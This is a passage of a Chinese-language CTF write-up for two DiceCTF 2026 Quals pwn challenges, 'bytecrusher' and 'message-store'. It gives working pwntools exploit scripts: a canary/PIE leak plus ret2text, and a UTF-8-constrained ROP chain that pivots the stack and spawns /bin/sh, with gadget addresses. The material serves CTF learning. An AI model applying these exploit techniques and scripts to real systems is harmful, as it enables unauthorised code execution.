class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">admin_portal</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>有越界写,通过选择合适的 rates 可以逐字节泄露 canary 和 pie ,毕竟至少有 16 字节的泄露机会</p> <p>然后在栈溢出上 ret2text 即可</p> <p>比较棘手的是本地打需要 Piggyback 技巧,但打远端不用</p> <p>这比赛还有个神秘的 PoW ,爆破什么的不大现实</p> <h3 id="ida">IDA </h3><h4 id="free_trial">free_trial </h4><p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="154px" data-flex-grow="64" height="783" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/contest/DiceCTF-2026-Quals/bytecrusher/free_trial.png" width="503"></p> <h4 id="get_feedback">get_feedback </h4><p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="703px" data-flex-grow="293" height="223" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/contest/DiceCTF-2026-Quals/bytecrusher/get_feedback.png" width="654"></p> <h3 id="exp">exp </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s1">&#39;debug&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s1">&#39;amd64&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s1">&#39;tmux&#39;</span><span class="p">,</span> <span class="s1">&#39;splitw&#39;</span><span class="p">,</span> <span class="s1">&#39;-h&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">debug</span> <span class="o">=</span> <span class="mi">0</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="n">debug</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s1">&#39;./bytecrusher_patched&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s1">&#39;bytecrusher.chals.dicec.tf&#39;</span><span class="p">,</span> <span class="mi">1337</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">canary_rates</span> <span class="o">=</span> <span class="p">[</span><span class="mh">0x49</span><span class="p">,</span> <span class="mh">0x4a</span><span class="p">,</span> <span class="mh">0x4b</span><span class="p">,</span> <span class="mh">0x4c</span><span class="p">,</span> <span class="mh">0x4d</span><span class="p">,</span> <span class="mh">0x4e</span><span class="p">,</span> <span class="mh">0x4f</span><span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="n">pie_rates</span> <span class="o">=</span> <span class="p">[</span><span class="mh">0x58</span><span class="p">,</span> <span class="mh">0x59</span><span class="p">,</span> <span class="mh">0x5a</span><span class="p">,</span> <span class="mh">0x5b</span><span class="p">,</span> <span class="mh">0x5c</span><span class="p">,</span> <span class="mh">0x5d</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s1">&#39;./libc.so.6&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">crush</span><span class="p">(</span><span class="n">rate</span><span class="p">,</span> <span class="n">output_len</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;crush:</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;rate:</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">rate</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;length:</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">output_len</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">attack</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">canary</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">canary_rates</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">crush</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="mi">3</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s2">&#34;string:</span><span class="se">\n</span><span class="s2">A&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">canary</span> <span class="o">+=</span> <span class="n">io</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">canary</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">canary</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;canary = </span><span class="si">{</span><span class="nb">hex</span><span class="p">(</span><span class="n">canary</span><span class="p">)</span><span class="si">}</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">pie</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;&#39;</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">pie_rates</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">crush</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="mi">3</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s2">&#34;string:</span><span class="se">\n</span><span class="s2">A&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">pie</span> <span class="o">+=</span> <span class="n">io</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">pie</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">pie</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span> <span class="o">-</span> <span class="mh">0x15EC</span> </span></span><span class="line"><span class="cl"> <span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;pie = </span><span class="si">{</span><span class="nb">hex</span><span class="p">(</span><span class="n">pie</span><span class="p">)</span><span class="si">}</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">3</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">crush</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">3</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span> <span class="o">*</span> <span class="mh">0x18</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">canary</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">pie</span> <span class="o">+</span> <span class="mh">0x12AD</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;text:</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s2">&#34;proof of work:</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">pow_cmd</span> <span class="o">=</span> <span class="n">io</span><span class="o">.</span><span class="n">recvline</span><span class="p">()</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s1">&#39;utf-8&#39;</span><span class="p">)</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s2">&#34;solution: &#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">result</span> <span class="o">=</span> <span class="n">subprocess</span><span class="o">.</span><span class="n">check_output</span><span class="p">(</span><span class="n">pow_cmd</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s1">&#39;utf-8&#39;</span><span class="p">)</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">result</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"><span class="n">attack</span><span class="p">()</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="message-store">message-store </h2><h3 id="checksec-1">checksec </h3><p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="642px" data-flex-grow="267" height="224" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/contest/DiceCTF-2026-Quals/message-store/checksec.png" width="600"></p> <h3 id="ida-1">IDA </h3><h4 id="main">main </h4><p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="168px" data-flex-grow="70" height="1240" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/contest/DiceCTF-2026-Quals/message-store/main.png" width="868"></p> <p>入口</p> <h4 id="set_message">set_message </h4><p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="394px" data-flex-grow="164" height="525" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/contest/DiceCTF-2026-Quals/message-store/set_message.png" width="864"></p> <p>允许写入 BUFFER</p> <h4 id="set_message_color">set_message_color </h4><p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="426px" data-flex-grow="177" height="393" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/contest/DiceCTF-2026-Quals/message-store/set_message_color.png" width="699"></p> <p>设置 color</p> <h4 id="print_message">print_message </h4><p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="400px" data-flex-grow="166" height="624" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/contest/DiceCTF-2026-Quals/message-store/print_message.png" width="1041"></p> <p>没有校验 COLOR 的大小,存在数组越界写,可以执行函数指针,只要提前往 BUFFER 写入即可</p> <p>需要注意 from_utf8_lossy</p> <h4 id="from_utf8_lossy">from_utf8_lossy </h4><p>from_utf8_lossy 是 Rust 标准库中用于处理可能包含无效 UTF-8 序列的字节数据‌ 的方法,其核心特点是 ‌“有损但保证成功”‌</p> <p>from_utf8_lossy ‌行为‌: 若字节序列是有效 UTF-8‌ ,直接借用为 &amp;str ,不分配内存‌ 若遇到无效 UTF-8 字节‌,用 Unicode 替换字符 ‌�(U+FFFD)替换,并返回一个‌新分配的 String‌</p> <h4 id="buffer">BUFFER </h4><p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="1037px" data-flex-grow="432" height="237" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/contest/DiceCTF-2026-Quals/message-store/BUFFER1.png" width="1025"></p> <p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="411px" data-flex-grow="171" height="611" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/contest/DiceCTF-2026-Quals/message-store/BUFFER2.png" width="1047"></p> <h3 id="攻击思路">攻击思路 </h3><p>利用数组越界写执行函数指针,由于 rax 在执行函数指针时为 from_utf8_lossy 的返回值,结合 <code>xchg rsp, rax; ret;</code> 可以去执行 BUFFER 上布置的 ROP 链,</p> <p>但是这需要使 BUFFER 上布置的 ROP 链所使用的字节满足 UTF-8 规范:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">1字节: </span></span><span class="line"><span class="cl">00–7F </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">2字节: </span></span><span class="line"><span class="cl">C2–DF 80–BF </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">3字节: </span></span><span class="line"><span class="cl">E0 A0–BF 80–BF </span></span><span class="line"><span class="cl">E1–EC 80–BF 80–BF </span></span><span class="line"><span class="cl">ED 80–9F 80–BF </span></span><span class="line"><span class="cl">EE–EF 80–BF 80–BF </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">4字节: </span></span><span class="line"><span class="cl">F0 90–BF 80–BF 80–BF </span></span><span class="line"><span class="cl">F1–F3 80–BF 80–BF 80–BF </span></span><span class="line"><span class="cl">F4 80–8F 80–BF 80–BF </span></span></code></pre></td></tr></table> </div> </div><p>然后去筛选 gadgets 打 ret2syscall</p> <p>不过中间还需要布置 /bin/sh ,在 BUFFER 上布置然后传给 rdi 的地址不可能满足 1 字节 UTF-8 规范,但是可以满足 2 字节 UTF-8 规范: 0x2F9FD0 (小端序)</p> <p>rust pwn 直接逆向比较困难,结合 动态分析 / fuzz 去推测漏洞点是很好的技巧</p> <h3 id="exp-1">exp </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span><span class="lnt">79 </span><span class="lnt">80 </span><span class="lnt">81 </span><span class="lnt">82 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s1">&#39;debug&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s1">&#39;amd64&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s1">&#39;tmux&#39;</span><span class="p">,</span> <span class="s1">&#39;splitw&#39;</span><span class="p">,</span> <span class="s1">&#39;-h&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">debug</span> <span class="o">=</span> <span class="mi">1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="n">debug</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s1">&#39;./challenge&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s1">&#39;node5.buuoj.cn&#39;</span><span class="p">,</span> <span class="mi">26980</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">send_message</span><span class="p">(</span><span class="n">meesage</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;&gt; &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;1&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;New Message? &#39;</span><span class="p">,</span> <span class="n">meesage</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">send_message_color</span><span class="p">(</span><span class="n">color</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;&gt; &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;2&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;&gt; &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">color</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">print_message</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;&gt; &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;3&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">myexit</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;&gt; &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;4&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">attack</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rdi_pop_rbp_xor_eax_eax_ret</span> <span class="o">=</span> <span class="mh">0x2a1345</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rsi_ret</span> <span class="o">=</span> <span class="mh">0x243431</span> </span></span><span class="line"><span class="cl"> <span class="n">mov_rdx_rsi_add_rsp_0x80_pop_rbp_ret</span> <span class="o">=</span> <span class="mh">0x27146b</span> </span></span><span class="line"><span class="cl"> <span class="n">mov_rax_rbx_pop_rbx_ret</span> <span class="o">=</span> <span class="mh">0x24577a</span> </span></span><span class="line"><span class="cl"> <span class="n">syscall</span> <span class="o">=</span> <span class="mh">0x2a6602</span> </span></span><span class="line"><span class="cl"> <span class="n">xchg_rsp_rax_ret</span> <span class="o">=</span> <span class="mh">0x242d78</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">bin_sh</span> <span class="o">=</span> <span class="mh">0x2F9FD0</span> </span></span><span class="line"><span class="cl"> <span class="n">buffer</span> <span class="o">=</span> <span class="mh">0x2F9E38</span> </span></span><span class="line"><span class="cl"> <span class="n">funclist</span> <span class="o">=</span> <span class="mh">0x2F08E8</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">rop_chain</span> <span class="o">=</span> <span class="n">flat</span><span class="p">([</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rdi_pop_rbp_xor_eax_eax_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">bin_sh</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mi">0</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rsi_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mi">0</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">mov_rdx_rsi_add_rsp_0x80_pop_rbp_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">*</span> <span class="mh">0x11</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">mov_rax_rbx_pop_rbx_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mi">59</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">mov_rax_rbx_pop_rbx_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mi">59</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">syscall</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">xchg_rsp_rax_ret</span> </span></span><span class="line"><span class="cl"> <span class="p">])</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="n">flat</span><span class="p">({</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x0</span><span class="p">:</span> <span class="n">rop_chain</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">bin_sh</span> <span class="o">-</span> <span class="n">buffer</span><span class="p">:</span> <span class="s1">&#39;/bin/sh</span><span class="se">\x00</span><span class="s1">&#39;</span> </span></span><span class="line"><span class="cl"> <span class="p">},</span> <span class="n">filler</span> <span class="o">=</span> <span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">send_message</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">send_message_color</span><span class="p">((</span><span class="n">buffer</span> <span class="o">+</span> <span class="nb">len</span><span class="p">(</span><span class="n">rop_chain</span><span class="p">)</span> <span class="o">-</span> <span class="mi">8</span> <span class="o">-</span> <span class="n">funclist</span><span class="p">)</span> <span class="o">//</span> <span class="mi">8</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">gdb</span><span class="o">.</span><span class="n">attach</span><span class="p">(</span><span class="n">io</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">print_message</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">attack</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># .data.rel.ro:00000000002F08E8 funcs_243A92 dq offset _RNvYReNtCscVAelyVn9lu_7colored8Colorize3redB6_</span> </span></span><span class="line"><span class="cl"><span class="c1"># .bss:00000000002F9E38 ; challenge::BUFFER</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># 0x00000000002a1345: pop rdi; pop rbp; xor eax, eax; ret;</span> </span></span><span class="line"><span class="cl"><span class="c1"># 0x0000000000243431: pop rsi; ret;</span> </span></span><span class="line"><span class="cl"><span class="c1"># 0x000000000027146b: mov rdx, rsi; add rsp, 0x80; pop rbp; ret;</span> </span></span><span class="line"><span class="cl"><span class="c1"># 0x000000000024577a: mov rax, rbx; pop rbx; ret;</span> </span></span><span class="line"><span class="cl"><span class="c1"># 0x00000000002a6602: syscall;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># 0x0000000000242d78: xchg rsp, rax; ret;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># 